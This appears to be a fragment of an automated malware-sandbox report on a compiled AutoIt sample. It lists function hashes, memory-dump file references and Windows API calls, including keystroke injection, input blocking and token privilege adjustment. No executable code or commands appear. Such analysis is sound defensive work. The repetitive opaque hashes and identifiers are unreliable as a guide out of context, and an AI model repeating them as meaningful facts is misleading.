                                                                • Opcode ID: 192a5c8bf6d7f9902f6777c38aa1014f84ac4dfedd3ade1708f3bb0794917752
                                                                • Instruction ID: 9e25effdb0cc1a91e4dbf5f7a34d88a463d1f46c90f752d66f75e622daa19a71
                                                                • Opcode Fuzzy Hash: 192a5c8bf6d7f9902f6777c38aa1014f84ac4dfedd3ade1708f3bb0794917752
                                                                • Instruction Fuzzy Hash: 1FF0EC706052147AD71027794C4DFDB369DEFC5B61F000275F505D22C1D9749944C7B0
                                                                APIs
                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0077B25D
                                                                • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0077B270
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: InputSendkeybd_event
                                                                • String ID:
                                                                • API String ID: 3536248340-0
                                                                • Opcode ID: 636b5af045a3ca469cc033cf41a700b0eec0e909264a9e96989fd3ce56041af1
                                                                • Instruction ID: 3a82427765ddae691a036731353a69b65502cea8e43467958376d625109ca565
                                                                • Opcode Fuzzy Hash: 636b5af045a3ca469cc033cf41a700b0eec0e909264a9e96989fd3ce56041af1
                                                                • Instruction Fuzzy Hash: C2F01D7180424DABDF059FA0C805BBE7BB4FF09309F10C009F955A5192C37D86119F98
                                                                APIs
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007711FC), ref: 007710D4
                                                                • CloseHandle.KERNEL32(?,?,007711FC), ref: 007710E9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                • String ID:
                                                                • API String ID: 81990902-0
                                                                • Opcode ID: 3700517481fcbf6752649c48492dd09ec174043b1e956581ba1f653a5c718d22
                                                                • Instruction ID: 87c8f9bc81b1ab12f6e6c824503114ca8c6864d0cd184aa0a67b87fb9717aceb
                                                                • Opcode Fuzzy Hash: 3700517481fcbf6752649c48492dd09ec174043b1e956581ba1f653a5c718d22
                                                                • Instruction Fuzzy Hash: A4E04F32004610FEEB262B11FC09E7377A9EF04310B10C82DF4A6804B1DB666C90DB54
                                                                APIs
                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00746766,?,?,00000008,?,?,0074FEFE,00000000), ref: 00746998
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ExceptionRaise
                                                                • String ID:
                                                                • API String ID: 3997070919-0
                                                                • Opcode ID: 70b4a4e4b461d8a138d0c5ba0b7c8f1543a90893c78c0c1db1a1b1613ece04d3
                                                                • Instruction ID: 7ae972dcdc914ef9c67f1d5c013db30c36c3acfa136c903ca9ebf6ec8c41be89
                                                                • Opcode Fuzzy Hash: 70b4a4e4b461d8a138d0c5ba0b7c8f1543a90893c78c0c1db1a1b1613ece04d3
                                                                • Instruction Fuzzy Hash: ABB13A71610608DFD719CF28C48AB657BE0FF46364F25C658E899CF2A2C339E991CB41
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: 19bba0cb93b2f0ec7d3eb8e7ec8c916e8382cd43b6dfa3238b19e5df71313222
                                                                • Instruction ID: cf08e47dcb5e5b5d909b0b1fed935b0b451a0f5847a6a15bb03ee41766231c96
                                                                • Opcode Fuzzy Hash: 19bba0cb93b2f0ec7d3eb8e7ec8c916e8382cd43b6dfa3238b19e5df71313222
                                                                • Instruction Fuzzy Hash: 4E124071900229DFCB54DF58D880AEEB7F5FF48710F14819AE849EB255EB389E81CB91
                                                                APIs
                                                                • BlockInput.USER32(00000001), ref: 0078EABD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: BlockInput
                                                                • String ID:
                                                                • API String ID: 3456056419-0
                                                                • Opcode ID: 6916a5b826447627815c10868500bbaec976fcac7505d3e6be37ccfe5010cf55
                                                                • Instruction ID: f25727e56b4a2aa9b75f43b1a001027f99e19c04d0618a56d7a973812295c804
                                                                • Opcode Fuzzy Hash: 6916a5b826447627815c10868500bbaec976fcac7505d3e6be37ccfe5010cf55
                                                                • Instruction Fuzzy Hash: 18E01A32240204AFC710EF59D808E9AB7E9AF98B60F04C416FC49C7291DB78E8818B91
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,007303EE), ref: 007309DA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: 993be9517cb20bae495fb910fdc548ca9f7819efee2c491ee7c1bf6a70b0ae6c
                                                                • Instruction ID: db1a77139aa106494364c2c9db253bd7165492016a29353edf7576696d33badc
                                                                • Opcode Fuzzy Hash: 993be9517cb20bae495fb910fdc548ca9f7819efee2c491ee7c1bf6a70b0ae6c
                                                                • Instruction Fuzzy Hash:
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0
                                                                • API String ID: 0-4108050209
                                                                • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                • Instruction ID: f8191f6f199374d7a7de4d3bb88afd30f1a8f5fdc7f4dc601de2d919780b7f4b
                                                                • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                • Instruction Fuzzy Hash: 2A517BF160C745ABFB3C8568889E7FE63C99B12300F184A09E982DB383C61DEE41D352
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0&~
                                                                • API String ID: 0-2940855197
                                                                • Opcode ID: d99bda3efd3b98660a66f5769668f672f82ecfdec9c89d466e79d9f1823139bf
                                                                • Instruction ID: 23a9c30f300783b5595706dec1a54ec2d1ff898a85e86232ecfee897233ffde6
                                                                • Opcode Fuzzy Hash: d99bda3efd3b98660a66f5769668f672f82ecfdec9c89d466e79d9f1823139bf
                                                                • Instruction Fuzzy Hash: D32108322612108BDB28CE79C81267A73E9A754310F14862EE0A3C77C1DE79A905C784
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c9a339bef2efb18e2ada37f51dd80d93e66ee8d36b7876cb01f817cc1e1ed47e
                                                                • Instruction ID: 22e22bc5b31753577da14bfc814d629730718cce7a124dcdbf0083324ba6bf15
                                                                • Opcode Fuzzy Hash: c9a339bef2efb18e2ada37f51dd80d93e66ee8d36b7876cb01f817cc1e1ed47e
                                                                • Instruction Fuzzy Hash: 64322522D29F414DDB279635CC22335A64DAFB73C5F15D737E81AB59AAEB2DC4838100
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e699f4f1c5674846153a35a5bdbe24d12dea3de762b667191215d5113a896f96
                                                                • Instruction ID: c1119d207840d97d6aa02c00fb6546fc0faa0234f2570b27361c7a66f0119b3d
                                                                • Opcode Fuzzy Hash: e699f4f1c5674846153a35a5bdbe24d12dea3de762b667191215d5113a896f96
                                                                • Instruction Fuzzy Hash: ED321431A001158BDF2ACF68D89467D7BA1EB55300F28816ADCCBDB291E73CDE81DB61
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cc45e283238a40438c4aab90623d012d49e31cec7af0159fc3aa07dfdcd4fcb9
                                                                • Instruction ID: 6df75fee7115c8fcb1ad3a95c0214df383bb5496b31084d9499c01030bdf6364
                                                                • Opcode Fuzzy Hash: cc45e283238a40438c4aab90623d012d49e31cec7af0159fc3aa07dfdcd4fcb9
                                                                • Instruction Fuzzy Hash: 4222D2B0A04609DFDF14CF68D895AEEB3F6FF44300F204129E816A7291EB79AD55CB50
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 28a3e98a44a43d2aead62a97e4b07309e525b695a3335fe4baebe67538523e18
                                                                • Instruction ID: 1e97ac94efa82c04c7ad305575cb51394b32ed07f54bb2273f93c29978fecb21
                                                                • Opcode Fuzzy Hash: 28a3e98a44a43d2aead62a97e4b07309e525b695a3335fe4baebe67538523e18
                                                                • Instruction Fuzzy Hash: CE02F6B0E00209EBDF04DF64D885AEEB7B5FF44300F108169E9169B291EB79EE55CB91
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                • Instruction ID: 747b0c9e019a034b9de7d67fc5b7c3da95c9e076cf59fd8d8f445c97d31a785a
                                                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                • Instruction Fuzzy Hash: 289189732090E34AFB29463E857403EFFE15A523A2B5A079DD4F2CB1C6FE18D954D620
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                • Instruction ID: 2e7442406410d10b90ae99023f84cb40d72b1cf45a2ec00d4cd01b45524e4982
                                                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                • Instruction Fuzzy Hash: 1891577220D0E34EFB2D467A857403DFFE15A923A2B5A479ED4F2CA1C2FD18D564D620
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dfd0d2c3257da00639d646b22c01c1629f9e3bf052da45c9275d2e636b0d6bd4
                                                                • Instruction ID: 623a69fd8901438e650cf29196f87b6b738da55f9ad7a3129dbb2d8bdc5558a5
                                                                • Opcode Fuzzy Hash: dfd0d2c3257da00639d646b22c01c1629f9e3bf052da45c9275d2e636b0d6bd4
                                                                • Instruction Fuzzy Hash: 2E615CF1208749A6FE7C5A2C8C95BBEA3A8DF41700F14491DF843DB283D61D9E42C366
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7fd21dba53f14f859ba0de681d46060ed441d4903cf556a69dd17ba3737f8276
                                                                • Instruction ID: cd8a879b8a2401a0b19c43e13ec49133553584e1da7a1fd6f33f025e24f753f4
                                                                • Opcode Fuzzy Hash: 7fd21dba53f14f859ba0de681d46060ed441d4903cf556a69dd17ba3737f8276
                                                                • Instruction Fuzzy Hash: D4616BF1758709A6FE3C5A288896BBF2398DF41700F104959F943DF283D62EAD41C356
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                • Instruction ID: 228bda9c24756fb4c75185dcb6c225ed39b42796dd5b22932373e3461a26a414
                                                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                • Instruction Fuzzy Hash: 3A8193726080E309FB2D823A853407EFFE15A923B1B5E079DD4F2CA1C3EE28D554E620
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                • Instruction ID: 80543ea91ffe9483b24d06eea688bedf3d45a478e69a77667d98ec05d630ca51
                                                                • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                • Instruction Fuzzy Hash: CD41D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                • Instruction ID: 80b8e3babe47584d4980bae4e24cbd6d84116fef46bb451b501121761ce598c0
                                                                • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                • Instruction Fuzzy Hash: F4019278A00109EFCB48EF98C9909AEF7B5FF48314F608599E819A7741D730AE41DF90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                • Instruction ID: 955639ab06dc74622b261b9cd41035abb72010b4502340053ea01ca975bd4710
                                                                • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                • Instruction Fuzzy Hash: C701A478A00109EFCB44EF98C9909AEF7F5FF48314F608599E819A7701D730AE41DB80
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                APIs
                                                                • DeleteObject.GDI32(00000000), ref: 00792B30
                                                                • DeleteObject.GDI32(00000000), ref: 00792B43
                                                                • DestroyWindow.USER32 ref: 00792B52
                                                                • GetDesktopWindow.USER32 ref: 00792B6D
                                                                • GetWindowRect.USER32(00000000), ref: 00792B74
                                                                • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00792CA3
                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00792CB1
                                                                • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00792CF8
                                                                • GetClientRect.USER32(00000000,?), ref: 00792D04
                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00792D40
                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00792D62
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00792D75
                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00792D80
                                                                • GlobalLock.KERNEL32(00000000), ref: 00792D89
                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00792D98
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00792DA1
                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00792DA8
